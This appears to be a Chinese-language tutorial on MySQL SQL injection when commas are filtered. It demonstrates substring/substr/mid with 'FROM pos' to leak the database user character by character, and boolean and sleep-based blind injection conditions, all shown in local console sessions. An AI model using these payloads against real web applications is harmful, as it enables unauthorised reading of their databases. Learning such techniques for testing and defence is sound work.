0x00 概要
不允许 逗号(,) 出现时的注入方法
- substring(str FROM pos)
- substr(str FROM pos)
- mid(str FROM pos)
- 从字符串str的起始位置pos 返回一个子串
0x01 解法
0x01.1 解法一
mysql> select ascii(substring((select user()) from 1));
+------------------------------------------+
| ascii(substring((select user()) from 1)) |
+------------------------------------------+
| 114 |
+------------------------------------------+
1 row in set (0.00 sec)
mysql> select ascii(substring((select user()) from 2));
+------------------------------------------+
| ascii(substring((select user()) from 2)) |
+------------------------------------------+
| 111 |
+------------------------------------------+
1 row in set (0.00 sec)
0x01.2 解法二
mysql> select substring((select user()) from 1 for 1);
+------------------------------------------+
| substring((select user()) from 1 for 1) |
+------------------------------------------+
| r |
+------------------------------------------+
1 row in set (0.00 sec)
mysql> select substring((select user()) from 2 for 1);
+------------------------------------------+
| substring((select user()) from 2 for 1) |
+------------------------------------------+
| o |
+------------------------------------------+
1 row in set (0.00 sec)
0x02 盲注实验
0x02.1 基础数据
// 当前用户
mysql> select user();
+----------------+
| user() |
+----------------+
| root@localhost |
+----------------+
1 row in set (0.00 sec)
// 测试数据
mysql> select * from test where id = 1;
+----+------+------+---------+
| id | test | map | content |
+----+------+------+---------+
| 1 | 1 | NULL | NULL |
+----+------+------+---------+
1 row in set (0.00 sec)
0x02.2 编码转换
// 第一个字符的ascii码
mysql> select ascii(mid(user() from 1));
+---------------------------+
| ascii(mid(user() from 1)) |
+---------------------------+
| 114 |
+---------------------------+
1 row in set (0.00 sec)
// 第二个字符的ascii码
mysql> select ascii(mid(user() from 2));
+---------------------------+
| ascii(mid(user() from 2)) |
+---------------------------+
| 111 |
+---------------------------+
1 row in set (0.00 sec)
// 十进制转码
mysql> select char(114);
+-----------+
| char(114) |
+-----------+
| r |
+-----------+
1 row in set (0.00 sec)
// 十进制转码
mysql> select char(111);
+-----------+
| char(111) |
+-----------+
| o |
+-----------+
1 row in set (0.00 sec)
0x02.3 解法一-布尔盲注查询数据库用户名
substring, substr, mid 这3个函数利用方式都是一样的,所以就只举例一个
// 正确的情况
mysql> SELECT * from test where id = 1 and (select ascii(mid(user() from 1))=114);
+----+------+------+---------+
| id | test | map | content |
+----+------+------+---------+
| 1 | 1 | NULL | NULL |
+----+------+------+---------+
1 row in set (0.00 sec)
// 错误的情况
mysql> SELECT * from test where id = 1 and (select ascii(mid(user() from 1))=119);
Empty set (0.00 sec)
0x02.4 解法一-延时盲注查询数据库用户名
substring, substr, mid 这3个函数利用方式都是一样的,所以就只举例一个
// 正确的情况
mysql> SELECT * from test where id = 1 and case when(ascii(substring(user() from 1))=114) then sleep(5) else 0 end;
Empty set (5.00 sec)
// 错误的情况
mysql> SELECT * from test where id = 1 and case when(ascii(substring(user() from 1))=119) then sleep(5) else 0 end;
Empty set (0.00 sec)
0x02.5 解法二-延时盲注查询数据库用户名
substring, substr, mid 这3个函数利用方式都是一样的,所以就只举例一个
// 正确的情况
mysql> SELECT * from tdb_goods where goods_id = 1 and case when(substring(user() from 1 for 1)='r') then sleep(5) else 0 end;
Empty set (5.00 sec)
// 错误的情况
mysql> SELECT * from tdb_goods where goods_id = 1 and case when(substring(user() from 1 for 1)='x') then sleep(5) else 0 end;
Empty set (0.00 sec)